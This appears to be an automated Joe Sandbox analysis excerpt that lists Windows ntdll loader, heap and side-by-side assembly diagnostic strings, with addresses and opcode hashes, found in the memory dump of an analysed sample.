                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                            • API String ID: 0-3393094623
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 015F2DF0: LdrInitializeThunk.NTDLL ref: 015F2DFA
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F0BA3
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F0BB6
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F0D60
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F0D74
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 1404860816-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                            • API String ID: 0-2518169356
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01617D39
                                                                            • SsHd, xrefs: 015CA885
                                                                            • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01617D56
                                                                            • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01617D03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                            • API String ID: 0-2905229100
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                            • API String ID: 0-379654539
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • @, xrefs: 015E8591
                                                                            • LdrpInitializeProcess, xrefs: 015E8422
                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015E855E
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 015E8421
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1918872054
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • HEAP[%wZ]: , xrefs: 016154D1, 01615592
                                                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 016155AE
                                                                            • HEAP: , xrefs: 016154E0, 016155A1
                                                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 016154ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                            • API String ID: 0-1657114761
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • .Local, xrefs: 015E28D8
                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016222B6
                                                                            • SXS: %s() passed the empty activation context, xrefs: 016221DE
                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016221D9, 016222B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                            • API String ID: 0-1239276146
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01623437
                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01623456
                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0162342A
                                                                            • RtlDeactivateActivationContext, xrefs: 01623425, 01623432, 01623451
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                            • API String ID: 0-1245972979
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01610FE5
                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016110AE
                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0161106B
                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01611028
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                            • API String ID: 0-1468400865
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0161A992
                                                                            • apphelp.dll, xrefs: 015D2462
                                                                            • LdrpDynamicShimModule, xrefs: 0161A998
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0161A9A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-176724104
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • HEAP[%wZ]: , xrefs: 015C3255
                                                                            • HEAP: , xrefs: 015C3264
                                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015C327D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                            • API String ID: 0-617086771
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: """"$MitigationAuditOptions$MitigationOptions
                                                                            • API String ID: 0-1670051934
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • HEAP[%wZ]: , xrefs: 015B1712
                                                                            • HEAP: , xrefs: 015B1596
                                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 015B1728
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: $@
                                                                            • API String ID: 2994545307-1077428164
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                                            • API String ID: 0-2779062949
                                                                            • Opcode ID: ddd2a724b45f049bf3d20f6687a5feaac484e0ad4d775d54ea0cdb4a20046377
                                                                            • Instruction ID: edd8f599c83396be182ec56ebf2682aafd9d44ce6627ec6c35af8547836d3afe
                                                                            • Opcode Fuzzy Hash: ddd2a724b45f049bf3d20f6687a5feaac484e0ad4d775d54ea0cdb4a20046377
                                                                            • Instruction Fuzzy Hash: 0EA15F7191162A9BDB36DF68CC88BAEB7B8FF44700F1141E9E909AB250D7359E84CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpCheckModule, xrefs: 0161A117
                                                                            • Failed to allocated memory for shimmed module list, xrefs: 0161A10F
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0161A121
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-161242083
                                                                            • Opcode ID: 4f7a2203057ddb9df6be9e572248d419fe548108c8e01d3028388eb04d4cda00
                                                                            • Instruction ID: d5ff4bf728e8fdf37ff6cd4fdbabec66104d44887005571a5361edffe10f439a
                                                                            • Opcode Fuzzy Hash: 4f7a2203057ddb9df6be9e572248d419fe548108c8e01d3028388eb04d4cda00
                                                                            • Instruction Fuzzy Hash: 4471AC71A00206DFDB25EFACCD81ABEB7F4FB84604F58446DE906AB395E734A941CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-1334570610
                                                                            • Opcode ID: 8d8a12552098ee892331719d1c7725ffbf915a5d0f99c73ae31240dbf20a2b58
                                                                            • Instruction ID: 6722131304a8d06bcfdcb509cf56552413bfd439e785355fec9a64b14454a1ae
                                                                            • Opcode Fuzzy Hash: 8d8a12552098ee892331719d1c7725ffbf915a5d0f99c73ae31240dbf20a2b58
                                                                            • Instruction Fuzzy Hash: 9661A274600306DFDB29DF68C880B6ABBE1FF45B08F18855DE4568F296D7B0E881CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 016282DE
                                                                            • Failed to reallocate the system dirs string !, xrefs: 016282D7
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 016282E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-1783798831
                                                                            • Opcode ID: dbc821f232dbd815167a9efc6d20c7474cfc2edf5cf619f9156372109f22c357
                                                                            • Instruction ID: 089e3d7728da1dd593272f0a648ff358bab1479827e01dd2b128f3a2185e5aec
                                                                            • Opcode Fuzzy Hash: dbc821f232dbd815167a9efc6d20c7474cfc2edf5cf619f9156372109f22c357
                                                                            • Instruction Fuzzy Hash: B241F371591312ABC720EFA8DC44B5B7BE8BF95750F45982EF944DB250E770E8108F92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • PreferredUILanguages, xrefs: 0166C212
                                                                            • @, xrefs: 0166C1F1
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0166C1C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                            • API String ID: 0-2968386058
                                                                            • Opcode ID: 13011c648f4ca62be0a3122552abccc259448c49c6ec0355033248df604cb3ec
                                                                            • Instruction ID: 04290b00240a19114de0fce8e525fb540cad80e470e1416ac0b6636294a1a365
                                                                            • Opcode Fuzzy Hash: 13011c648f4ca62be0a3122552abccc259448c49c6ec0355033248df604cb3ec
                                                                            • Instruction Fuzzy Hash: 55416171E1060AEBDF11DAD8CC51FEEBBBCBB54704F14806AEA49B7240D7749A458B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                            • API String ID: 0-1373925480
                                                                            • Opcode ID: 609df1c0cc49ab3ccfed3cde4deb7fd118f8b3ee2e5336d93ac516ee4c6cddd8
                                                                            • Instruction ID: 4ba4b0a09f22c769f3ddb06ed9387e7bd4d052e54714f94478b52de22a35cb47
                                                                            • Opcode Fuzzy Hash: 609df1c0cc49ab3ccfed3cde4deb7fd118f8b3ee2e5336d93ac516ee4c6cddd8
                                                                            • Instruction Fuzzy Hash: C041FF71A00649CBEB26DBE9CC41BAEBBB8FF95340F14445AD901AF791DB359901CB11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01634888
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01634899
                                                                            • LdrpCheckRedirection, xrefs: 0163488F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 0-3154609507
                                                                            • Opcode ID: 92d6a46e372e87127b750ae24b306bf4b7a1835c4f68ebad6197f2c6c9110ce6
                                                                            • Instruction ID: 25319917502ef50a96664ddd2afc1d67a1d246b39f80b6b1e7e9e84c69eea331
                                                                            • Opcode Fuzzy Hash: 92d6a46e372e87127b750ae24b306bf4b7a1835c4f68ebad6197f2c6c9110ce6
                                                                            • Instruction Fuzzy Hash: 05419032A146519FCB22CE69DC40A36FBE9FFC9750B06056DED599B351DB30E810CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-2558761708
                                                                            • Opcode ID: eef5e219740088f8f006b4a9184d98f5288bb01972e78dc1c38350369b8fb3f8
                                                                            • Instruction ID: ab0de7de6882a8cbf67da2b1f9ecf7529e943611e2cdc0ecb6249f85f1b04660
                                                                            • Opcode Fuzzy Hash: eef5e219740088f8f006b4a9184d98f5288bb01972e78dc1c38350369b8fb3f8
                                                                            • Instruction Fuzzy Hash: 9211AC35396142DFDB29DE58C840B6AF3A5BB82B1AF18811DF4068F299DB34E881C795
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrpInitializationFailure, xrefs: 016320FA
                                                                            • Process initialization failed with status 0x%08lx, xrefs: 016320F3
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01632104
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2986994758
                                                                            • Opcode ID: 5c2c4169a8d5a98565248cf6de284a0df85d51ee16aa3feee0dad859c6a84dac
                                                                            • Instruction ID: a50fe2ad224487472c71210f23cdf5e9962032389f2318e015f4bdf9c3974e40
                                                                            • Opcode Fuzzy Hash: 5c2c4169a8d5a98565248cf6de284a0df85d51ee16aa3feee0dad859c6a84dac
                                                                            • Instruction Fuzzy Hash: 2CF0C235640319BBEB24E64CCD52FAA7BA8FB80B54F50006DFB007F785D2B0B950CA95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: #%u
                                                                            • API String ID: 48624451-232158463
                                                                            • Opcode ID: 59507a82331462aa4120cbaec19fa000cd55f4a1fc738d072ef762089897f564
                                                                            • Instruction ID: 984edb3d06bf4bfe218d75cf3b1ba58ba58bcd40a6aed75345923d363d71901e
                                                                            • Opcode Fuzzy Hash: 59507a82331462aa4120cbaec19fa000cd55f4a1fc738d072ef762089897f564
                                                                            • Instruction Fuzzy Hash: 74713972A0014A9FDB05DFA8C990BAEB7F8FF48744F144069E905EB251EB34AD01CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$@
                                                                            • API String ID: 0-149943524
                                                                            • Opcode ID: 8023b36f50128197ec1c25c0c141784fb6612b9a2b77c4790310950d72eecaa1
                                                                            • Instruction ID: a9152b71ab53d57171ccd7c70068406944db37b886614aef9e9aa037045876bb
                                                                            • Opcode Fuzzy Hash: 8023b36f50128197ec1c25c0c141784fb6612b9a2b77c4790310950d72eecaa1
                                                                            • Instruction Fuzzy Hash: C2327D746183128FD7248F99C88077EBBE1FF84B44F18491EFA859B290E774E984CB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • LdrResSearchResource Exit, xrefs: 015BAA25
                                                                            • LdrResSearchResource Enter, xrefs: 015BAA13
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                            • API String ID: 0-4066393604
                                                                            • Opcode ID: 9e198bd4d2c71e806e3b05173f58bc9bca67abae1e14ec446c069d2dc5bfc543
                                                                            • Instruction ID: 2c6d7a1fef62aaaf5a3ffd81d6d472a95f08e7f16e1cdeb73d8f0ff4b52bf551
                                                                            • Opcode Fuzzy Hash: 9e198bd4d2c71e806e3b05173f58bc9bca67abae1e14ec446c069d2dc5bfc543
                                                                            • Instruction Fuzzy Hash: C6E15071E00219AFEB22CE9DCD90BEEBBB9BF44310F244529E911EB355E7749941CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @4Cw@4Cw$PATH
                                                                            • API String ID: 0-1794901795
                                                                            • Opcode ID: 9aa1725b9d95a8d778d9f3384628f4d2292a248ad2ef32b98c519c836cd3b1c8
                                                                            • Instruction ID: d0eb71188ce6d4e0440a57abc3c2b4d088be517bbacfc69b51a0c83bc05ee009
                                                                            • Opcode Fuzzy Hash: 9aa1725b9d95a8d778d9f3384628f4d2292a248ad2ef32b98c519c836cd3b1c8
                                                                            • Instruction Fuzzy Hash: EFF19C719002199BDB65CF9CDC81AEEBBB5FF88700F998029E941BF350D734A951CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: `$`
                                                                            • API String ID: 0-197956300
                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                            • Instruction ID: bbeb9684ebe732bbf4e356c951da336f227b0ed088f8ed12b2439c90bd20e1b4
                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                            • Instruction Fuzzy Hash: 8AC1BD312043429BEB24CFA8CC45B6BBBE6AFC4718F084A2DF696CB290D775D545CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            • ResIdCount less than 2., xrefs: 0160EEC9
                                                                            • Failed to retrieve service checksum., xrefs: 0160EE56
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                            • API String ID: 0-863616075
                                                                            • Opcode ID: 6782a78aa0a193eb060a0ae101a8a25a9ec959a7cc8e41d5c9e6016c21a5608d
